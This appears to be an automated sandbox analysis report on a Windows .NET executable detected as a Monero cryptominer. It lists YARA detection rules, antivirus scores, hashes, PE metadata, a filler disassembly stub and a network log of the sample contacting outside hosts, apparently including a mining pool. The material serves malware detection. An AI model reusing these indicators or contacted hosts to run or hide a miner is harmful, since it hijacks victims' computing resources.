                                                                                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: unknown
                                                                                                                                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: Florian Roth
                                                                                                                                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: ditekSHen
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):7.929719404741846
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                            File name:file.exe
                                                                                                                                                            File size:13'188'608 bytes
                                                                                                                                                            MD5:e2982df7bd07c80ffdd02a7d680b64bc
                                                                                                                                                            SHA1:85d6417c7b391bea381eb07d56eff39efe051a04
                                                                                                                                                            SHA256:3fb42de7bef728db9db776ce892a5893f84b24c433253988d849c514a4008b67
                                                                                                                                                            SHA512:50b6fe1cf8cd4c253d8c78c44bb2435f9cca4abe7c3742aad2f36aaa784794badfd476b355f58702b4eb19db616aad43f21c4116cb3f6775deb1f1b188c359d1
                                                                                                                                                            SSDEEP:196608:IYCTcgSo0/AtEN/OWvOIC1g//iFwFS/DHFp36Y2lybUg2Qz1e:IYCTcghQAtEZVisqFmS/DHT36nyb93p
                                                                                                                                                            TLSH:97D602327114F55DB5B70DB05E82B3EF22BCF360BE563D9CD7A0524B9225628E4BA306
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L.Me.................4..........>S... ...`....@.. ....................................@................................
                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                            Entrypoint:0x109533e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x654DF74C [Fri Nov 10 09:26:36 2023 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc952e80x53.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc960000x4e8.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc980000xc.reloc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x20000xc933440xc93400unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0xc960000x4e80x600False0.376953125data3.7439121542733242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0xc980000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_VERSION0xc960a00x254data0.46476510067114096
                                                                                                                                                            RT_MANIFEST0xc962f80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                                                                            DLLImport
                                                                                                                                                            mscoree.dll_CorExeMain
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 10, 2023 15:35:35.858283043 CET4971580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:35:36.155765057 CET804971595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:36.158792019 CET4971580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:35:36.159581900 CET4971580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:35:36.159661055 CET4971580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:35:36.457026005 CET804971595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:36.457129002 CET804971595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:36.457345009 CET4971580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:35:36.459074020 CET4971580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:35:36.756429911 CET804971595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:57.795825958 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.096556902 CET144334971851.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.098942995 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.099541903 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.405169010 CET144334971851.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.405234098 CET144334971851.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.405299902 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.406169891 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.708564043 CET144334971851.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.708703041 CET144334971851.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.708745956 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.748305082 CET144334971851.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.799313068 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:58.843674898 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:58.843708038 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.843799114 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:58.868051052 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:58.868063927 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.193067074 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.194446087 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.194458008 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.195569992 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.195628881 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.197779894 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.197854042 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.197931051 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.197938919 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.252264023 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.831748962 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.831782103 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.831862926 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.831872940 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.831933022 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.846745014 CET49719443192.168.2.6172.67.34.170
                                                                                                                                                            Nov 10, 2023 15:35:59.846765041 CET44349719172.67.34.170192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:59.847501993 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:59.847527027 CET4971814433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:35:59.848079920 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:00.146975040 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:00.147066116 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:00.147428989 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:00.448524952 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:00.448540926 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:00.448606014 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:00.449366093 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:00.749380112 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:00.749634027 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:00.749689102 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:00.783705950 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:00.830430984 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:34.188868999 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:34.361607075 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:44.107213020 CET4972580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:44.415287971 CET804972595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:44.417797089 CET4972580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:44.418081045 CET4972580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:44.418103933 CET4972580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:44.726419926 CET804972595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:44.727458954 CET804972595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:44.727629900 CET4972580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:44.727721930 CET4972580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:44.812666893 CET4972680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.035667896 CET804972595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:45.113693953 CET804972695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:45.113809109 CET4972680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.114145041 CET4972680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.114195108 CET4972680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.415158033 CET804972695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:45.415339947 CET804972695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:45.415416002 CET4972680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.415623903 CET4972680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.492810011 CET4972780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.717453003 CET804972695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:45.794316053 CET804972795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:45.794799089 CET4972780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.795119047 CET4972780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:45.795156002 CET4972780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.094124079 CET804972795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:46.094574928 CET804972795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:46.094729900 CET4972780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.094880104 CET4972780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.142474890 CET4972880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.393297911 CET804972795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:46.439101934 CET804972895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:46.439598083 CET4972880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.439987898 CET4972880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.440033913 CET4972880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.736617088 CET804972895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:46.736902952 CET804972895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:46.737150908 CET4972880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.741940975 CET4972880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:46.829231977 CET4972980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.038369894 CET804972895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:47.127527952 CET804972995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:47.129328012 CET4972980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.129914999 CET4972980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.129966021 CET4972980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.428828001 CET804972995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:47.429282904 CET804972995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:47.429349899 CET4972980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.429523945 CET4972980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.494335890 CET4973080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.727581978 CET804972995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:47.795634031 CET804973095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:47.795770884 CET4973080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.796094894 CET4973080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:47.796139956 CET4973080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.097316027 CET804973095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.097372055 CET804973095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.097455025 CET4973080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.097801924 CET4973080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.173281908 CET4973180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.398876905 CET804973095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.470364094 CET804973195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.470493078 CET4973180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.470799923 CET4973180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.470834970 CET4973180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.768541098 CET804973195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.768601894 CET804973195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.768691063 CET4973180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:48.768841028 CET4973180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.039213896 CET4973280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.065973997 CET804973195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:49.337642908 CET804973295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:49.337860107 CET4973280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.338114023 CET4973280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.338149071 CET4973280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.638142109 CET804973295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:49.638225079 CET804973295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:49.638456106 CET4973280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.639062881 CET4973280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.716351032 CET4973380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:49.936072111 CET804973295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:50.017528057 CET804973395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:50.017992020 CET4973380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.018204927 CET4973380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.018291950 CET4973380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.319827080 CET804973395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:50.320105076 CET804973395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:50.320188999 CET4973380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.320414066 CET4973380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.513286114 CET4973480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.621526003 CET804973395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:50.814147949 CET804973495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:50.814249992 CET4973480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.814467907 CET4973480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:50.814503908 CET4973480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.115300894 CET804973495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:51.115509033 CET804973495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:51.115593910 CET4973480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.120642900 CET4973480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.259067059 CET4973580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.421327114 CET804973495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:51.558790922 CET804973595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:51.558896065 CET4973580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.559272051 CET4973580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.559272051 CET4973580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.858520031 CET804973595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:51.858726025 CET804973595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:51.858911991 CET4973580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:51.859050035 CET4973580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:52.158313036 CET804973595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:54.001039028 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:54.049161911 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:36:54.591897011 CET4973680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:54.893029928 CET804973695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:54.898905039 CET4973680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:54.899068117 CET4973680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:54.899097919 CET4973680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:55.200258970 CET804973695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:55.200535059 CET804973695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:55.200606108 CET4973680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:55.200860977 CET4973680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:55.502068043 CET804973695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:56.563148022 CET4973780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:56.864109039 CET804973795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:56.864355087 CET4973780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:56.864502907 CET4973780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:56.864552021 CET4973780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:57.165766954 CET804973795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:57.166098118 CET804973795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:57.166161060 CET4973780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:57.166347980 CET4973780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:36:57.467325926 CET804973795.214.26.28192.168.2.6
